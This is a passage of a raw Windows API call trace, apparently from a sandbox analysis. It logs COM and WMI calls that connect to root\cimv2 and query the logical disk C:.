lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x6e4e908, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0150.762] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6e4ee50 | out: ppv=0x6e4ee50*=0x72015c) returned 0x0 [0150.762] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x6e4ee48 | out: pAptType=0x6e4ee48*=1) returned 0x0 [0150.762] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6e4ee4c | out: ppvObject=0x6e4ee4c*=0x0) returned 0x80004002 [0150.762] IUnknown:Release (This=0x72015c) returned 0x1 [0150.763] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6e4e7b8 | out: ppv=0x6e4e7b8*=0x6736fc8) returned 0x0 [0150.764] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736fc8, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6e4e9d0 | out: ppvObject=0x6e4e9d0*=0x0) returned 0x80004002 [0150.764] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6736fc8, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6e4e9e4 | out: ppvObject=0x6e4e9e4*=0x6737f20) returned 0x0 [0150.764] WbemDefPath:IUnknown:Release (This=0x6736fc8) returned 0x0 [0150.764] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737f20, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6e4e604 | out: ppvObject=0x6e4e604*=0x6737f20) returned 0x0 [0150.764] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737f20, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6e4e5c0 | out: ppvObject=0x6e4e5c0*=0x0) returned 0x80004002 [0150.764] WbemDefPath:IUnknown:AddRef (This=0x6737f20) returned 0x3 [0150.764] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737f20, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6e4df1c | out: ppvObject=0x6e4df1c*=0x0) returned 0x80004002 [0150.764] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737f20, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6e4decc | out: ppvObject=0x6e4decc*=0x0) returned 0x80004002 [0150.764] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737f20, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6e4ded8 | out: ppvObject=0x6e4ded8*=0x765118) returned 0x0 [0150.764] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x765118, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6e4dee0 | out: pCid=0x6e4dee0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0150.764] WbemDefPath:IUnknown:Release (This=0x765118) returned 0x3 [0150.764] CoGetContextToken (in: pToken=0x6e4df38 | out: pToken=0x6e4df38) returned 0x0 [0150.765] CoGetContextToken (in: pToken=0x6e4e340 | out: pToken=0x6e4e340) returned 0x0 [0150.765] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737f20, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6e4e3d0 | out: ppvObject=0x6e4e3d0*=0x0) returned 0x80004002 [0150.765] WbemDefPath:IUnknown:Release (This=0x6737f20) returned 0x2 [0150.765] WbemDefPath:IUnknown:Release (This=0x6737f20) returned 0x1 [0150.765] CoGetContextToken (in: pToken=0x6e4ecc8 | out: pToken=0x6e4ecc8) returned 0x0 [0150.765] CoGetContextToken (in: pToken=0x6e4ec28 | out: pToken=0x6e4ec28) returned 0x0 [0150.765] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737f20, riid=0x6e4ecf8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6e4ecf4 | out: ppvObject=0x6e4ecf4*=0x6737f20) returned 0x0 [0150.765] WbemDefPath:IUnknown:AddRef (This=0x6737f20) returned 0x3 [0150.765] WbemDefPath:IUnknown:Release (This=0x6737f20) returned 0x2 [0150.765] WbemDefPath:IWbemPath:SetText (This=0x6737f20, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0150.765] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6737f20, puCount=0x6e4ee7c | out: puCount=0x6e4ee7c*=0x0) returned 0x0 [0150.765] WbemDefPath:IWbemPath:GetText (in: This=0x6737f20, lFlags=2, puBuffLength=0x6e4ee78*=0x0, pszText=0x0 | out: puBuffLength=0x6e4ee78*=0x20, pszText=0x0) returned 0x0 [0150.765] WbemDefPath:IWbemPath:GetText (in: This=0x6737f20, lFlags=2, puBuffLength=0x6e4ee78*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6e4ee78*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0150.765] WbemDefPath:IWbemPath:GetInfo (in: This=0x6737f20, uRequestedInfo=0x0, puResponse=0x6e4ee84 | out: puResponse=0x6e4ee84*=0xc19) returned 0x0 [0150.765] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6737f20, puCount=0x6e4ee7c | out: puCount=0x6e4ee7c*=0x0) returned 0x0 [0150.765] WbemDefPath:IWbemPath:GetInfo (in: This=0x6737f20, uRequestedInfo=0x0, puResponse=0x6e4ee84 | out: puResponse=0x6e4ee84*=0xc19) returned 0x0 [0150.765] WbemDefPath:IWbemPath:GetInfo (in: This=0x6737f20, uRequestedInfo=0x0, puResponse=0x6e4ee84 | out: puResponse=0x6e4ee84*=0xc19) returned 0x0 [0150.765] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6737f20, puCount=0x6e4edfc | out: puCount=0x6e4edfc*=0x0) returned 0x0 [0150.765] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67209c0, puCount=0x6e4ede8 | out: puCount=0x6e4ede8*=0x2) returned 0x0 [0150.766] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x6e4ede4*=0x0, pszText=0x0 | out: puBuffLength=0x6e4ede4*=0xf, pszText=0x0) returned 0x0 [0150.766] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x6e4ede4*=0xf, pszText="00000000000000" | out: puBuffLength=0x6e4ede4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0150.766] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6e4ed98 | out: ppv=0x6e4ed98*=0x72015c) returned 0x0 [0150.766] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x6e4ed90 | out: pAptType=0x6e4ed90*=1) returned 0x0 [0150.766] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6e4ed94 | out: ppvObject=0x6e4ed94*=0x0) returned 0x80004002 [0150.766] IUnknown:Release (This=0x72015c) returned 0x1 [0150.767] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6e4e700 | out: ppv=0x6e4e700*=0x6736e78) returned 0x0 [0150.767] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736e78, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6e4e918 | out: ppvObject=0x6e4e918*=0x0) returned 0x80004002 [0150.767] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6736e78, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6e4e92c | out: ppvObject=0x6e4e92c*=0x6737eb0) returned 0x0 [0150.767] WbemDefPath:IUnknown:Release (This=0x6736e78) returned 0x0 [0150.767] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737eb0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6e4e54c | out: ppvObject=0x6e4e54c*=0x6737eb0) returned 0x0 [0150.767] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737eb0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6e4e508 | out: ppvObject=0x6e4e508*=0x0) returned 0x80004002 [0150.767] WbemDefPath:IUnknown:AddRef (This=0x6737eb0) returned 0x3 [0150.767] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737eb0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6e4de64 | out: ppvObject=0x6e4de64*=0x0) returned 0x80004002 [0150.767] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737eb0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6e4de14 | out: ppvObject=0x6e4de14*=0x0) returned 0x80004002 [0150.767] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737eb0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6e4de20 | out: ppvObject=0x6e4de20*=0x765248) returned 0x0 [0150.767] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x765248, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6e4de28 | out: pCid=0x6e4de28*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0150.767] WbemDefPath:IUnknown:Release (This=0x765248) returned 0x3 [0150.767] CoGetContextToken (in: pToken=0x6e4de80 | out: pToken=0x6e4de80) returned 0x0 [0150.767] CoGetContextToken (in: pToken=0x6e4e288 | out: pToken=0x6e4e288) returned 0x0 [0150.768] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737eb0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6e4e318 | out: ppvObject=0x6e4e318*=0x0) returned 0x80004002 [0150.768] WbemDefPath:IUnknown:Release (This=0x6737eb0) returned 0x2 [0150.768] WbemDefPath:IUnknown:Release (This=0x6737eb0) returned 0x1 [0150.768] CoGetContextToken (in: pToken=0x6e4ec10 | out: pToken=0x6e4ec10) returned 0x0 [0150.768] CoGetContextToken (in: pToken=0x6e4eb70 | out: pToken=0x6e4eb70) returned 0x0 [0150.768] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737eb0, riid=0x6e4ec40*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6e4ec3c | out: ppvObject=0x6e4ec3c*=0x6737eb0) returned 0x0 [0150.768] WbemDefPath:IUnknown:AddRef (This=0x6737eb0) returned 0x3 [0150.768] WbemDefPath:IUnknown:Release (This=0x6737eb0) returned 0x2 [0150.768] WbemDefPath:IWbemPath:SetText (This=0x6737eb0, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0150.768] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6737eb0, puCount=0x6e4edc0 | out: puCount=0x6e4edc0*=0x2) returned 0x0 [0150.768] WbemDefPath:IWbemPath:GetText (in: This=0x6737eb0, lFlags=4, puBuffLength=0x6e4edbc*=0x0, pszText=0x0 | out: puBuffLength=0x6e4edbc*=0xf, pszText=0x0) returned 0x0 [0150.768] WbemDefPath:IWbemPath:GetText (in: This=0x6737eb0, lFlags=4, puBuffLength=0x6e4edbc*=0xf, pszText="00000000000000" | out: puBuffLength=0x6e4edbc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0150.768] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6e4edc0 | out: ppv=0x6e4edc0*=0x72015c) returned 0x0 [0150.768] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x6e4edb8 | out: pAptType=0x6e4edb8*=1) returned 0x0 [0150.768] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6e4edbc | out: ppvObject=0x6e4edbc*=0x0) returned 0x80004002 [0150.768] IUnknown:Release (This=0x72015c) returned 0x1 [0150.769] CoGetClassObject (in: rclsid=0x7588d4*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6e4e9e0 | out: ppv=0x6e4e9e0*=0x673ecc0) returned 0x0 [0150.769] WbemLocator:IUnknown:QueryInterface (in: This=0x673ecc0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6e4ebf8 | out: ppvObject=0x6e4ebf8*=0x0) returned 0x80004002 [0150.769] WbemLocator:IClassFactory:CreateInstance (in: This=0x673ecc0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6e4ec0c | out: ppvObject=0x6e4ec0c*=0x6736e18) returned 0x0 [0150.769] WbemLocator:IUnknown:Release (This=0x673ecc0) returned 0x0 [0150.769] WbemLocator:IUnknown:QueryInterface (in: This=0x6736e18, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6e4e82c | out: ppvObject=0x6e4e82c*=0x6736e18) returned 0x0 [0150.769] WbemLocator:IUnknown:QueryInterface (in: This=0x6736e18, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6e4e7e8 | out: ppvObject=0x6e4e7e8*=0x0) returned 0x80004002 [0150.770] WbemLocator:IUnknown:AddRef (This=0x6736e18) returned 0x3 [0150.770] WbemLocator:IUnknown:QueryInterface (in: This=0x6736e18, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6e4e144 | out: ppvObject=0x6e4e144*=0x0) returned 0x80004002 [0150.770] WbemLocator:IUnknown:QueryInterface (in: This=0x6736e18, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6e4e0f4 | out: ppvObject=0x6e4e0f4*=0x0) returned 0x80004002 [0150.770] WbemLocator:IUnknown:QueryInterface (in: This=0x6736e18, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6e4e100 | out: ppvObject=0x6e4e100*=0x0) returned 0x80004002 [0150.770] CoGetContextToken (in: pToken=0x6e4e160 | out: pToken=0x6e4e160) returned 0x0 [0150.770] CoGetContextToken (in: pToken=0x6e4e568 | out: pToken=0x6e4e568) returned 0x0 [0150.770] WbemLocator:IUnknown:QueryInterface (in: This=0x6736e18, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6e4e5f8 | out: ppvObject=0x6e4e5f8*=0x0) returned 0x80004002 [0150.770] WbemLocator:IUnknown:Release (This=0x6736e18) returned 0x2 [0150.770] WbemLocator:IUnknown:Release (This=0x6736e18) returned 0x1 [0150.770] CoGetContextToken (in: pToken=0x6e4ebd8 | out: pToken=0x6e4ebd8) returned 0x0 [0150.770] CoGetContextToken (in: pToken=0x6e4eb38 | out: pToken=0x6e4eb38) returned 0x0 [0150.770] WbemLocator:IUnknown:QueryInterface (in: This=0x6736e18, riid=0x6e4ec08*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x6e4ec04 | out: ppvObject=0x6e4ec04*=0x6736e18) returned 0x0 [0150.770] WbemLocator:IUnknown:AddRef (This=0x6736e18) returned 0x3 [0150.770] WbemLocator:IUnknown:Release (This=0x6736e18) returned 0x2 [0150.770] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6737eb0, puCount=0x6e4ed9c | out: puCount=0x6e4ed9c*=0x2) returned 0x0 [0150.770] WbemDefPath:IWbemPath:GetText (in: This=0x6737eb0, lFlags=8, puBuffLength=0x6e4ed98*=0x0, pszText=0x0 | out: puBuffLength=0x6e4ed98*=0xf, pszText=0x0) returned 0x0 [0150.770] WbemDefPath:IWbemPath:GetText (in: This=0x6737eb0, lFlags=8, puBuffLength=0x6e4ed98*=0xf, pszText="00000000000000" | out: puBuffLength=0x6e4ed98*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0150.770] CoCreateInstance (in: rclsid=0x745f1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x745f12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x6e4ec74 | out: ppv=0x6e4ec74*=0x6736db8) returned 0x0 [0150.771] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6736db8, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x6e4ed08 | out: ppNamespace=0x6e4ed08*=0x6742f1c) returned 0x0 [0151.765] WbemLocator:IUnknown:QueryInterface (in: This=0x6742f1c, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6e4eba4 | out: ppvObject=0x6e4eba4*=0x781454) returned 0x0 [0151.765] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x781454, pProxy=0x6742f1c, pAuthnSvc=0x6e4ebf4, pAuthzSvc=0x6e4ebf0, pServerPrincName=0x6e4ebe8, pAuthnLevel=0x6e4ebec, pImpLevel=0x6e4ebdc, pAuthInfo=0x6e4ebe0, pCapabilites=0x6e4ebe4 | out: pAuthnSvc=0x6e4ebf4*=0xa, pAuthzSvc=0x6e4ebf0*=0x0, pServerPrincName=0x6e4ebe8, pAuthnLevel=0x6e4ebec*=0x6, pImpLevel=0x6e4ebdc*=0x2, pAuthInfo=0x6e4ebe0, pCapabilites=0x6e4ebe4*=0x1) returned 0x0 [0151.765] WbemLocator:IUnknown:Release (This=0x781454) returned 0x1 [0151.765] WbemLocator:IUnknown:QueryInterface (in: This=0x6742f1c, riid=0x745f10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6e4eb98 | out: ppvObject=0x6e4eb98*=0x781474) returned 0x0 [0151.765] WbemLocator:IUnknown:QueryInterface (in: This=0x6742f1c, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6e4eb94 | out: ppvObject=0x6e4eb94*=0x781454) returned 0x0 [0151.765] WbemLocator:IClientSecurity:SetBlanket (This=0x781454, pProxy=0x6742f1c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0151.766] WbemLocator:IUnknown:Release (This=0x781454) returned 0x2 [0151.766] WbemLocator:IUnknown:Release (This=0x781474) returned 0x1 [0151.766] CoTaskMemFree (pv=0x77e0b8) [0151.766] WbemLocator:IUnknown:Release (This=0x6736db8) returned 0x0 [0151.766] WbemLocator:IUnknown:QueryInterface (in: This=0x6742f1c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6e4e794 | out: ppvObject=0x6e4e794*=0x781474) returned 0x0 [0151.766] WbemLocator:IUnknown:QueryInterface (in: This=0x781474, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6e4e750 | out: ppvObject=0x6e4e750*=0x0) returned 0x80004002 [0151.767] WbemLocator:IUnknown:QueryInterface (in: This=0x781474, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6e4e56c | out: ppvObject=0x6e4e56c*=0x0) returned 0x80004002 [0152.363] WbemLocator:IUnknown:AddRef (This=0x781474) returned 0x3 [0152.363] WbemLocator:IUnknown:QueryInterface (in: This=0x781474, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6e4e0ac | out: ppvObject=0x6e4e0ac*=0x0) returned 0x80004002 [0152.935] WbemLocator:IUnknown:QueryInterface (in: This=0x781474, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6e4e05c | out: ppvObject=0x6e4e05c*=0x0) returned 0x80004002 [0152.941] WbemLocator:IUnknown:QueryInterface (in: This=0x781474, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6e4e068 | out: ppvObject=0x6e4e068*=0x7813d4) returned 0x0 [0152.941] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x7813d4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6e4e070 | out: pCid=0x6e4e070*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, 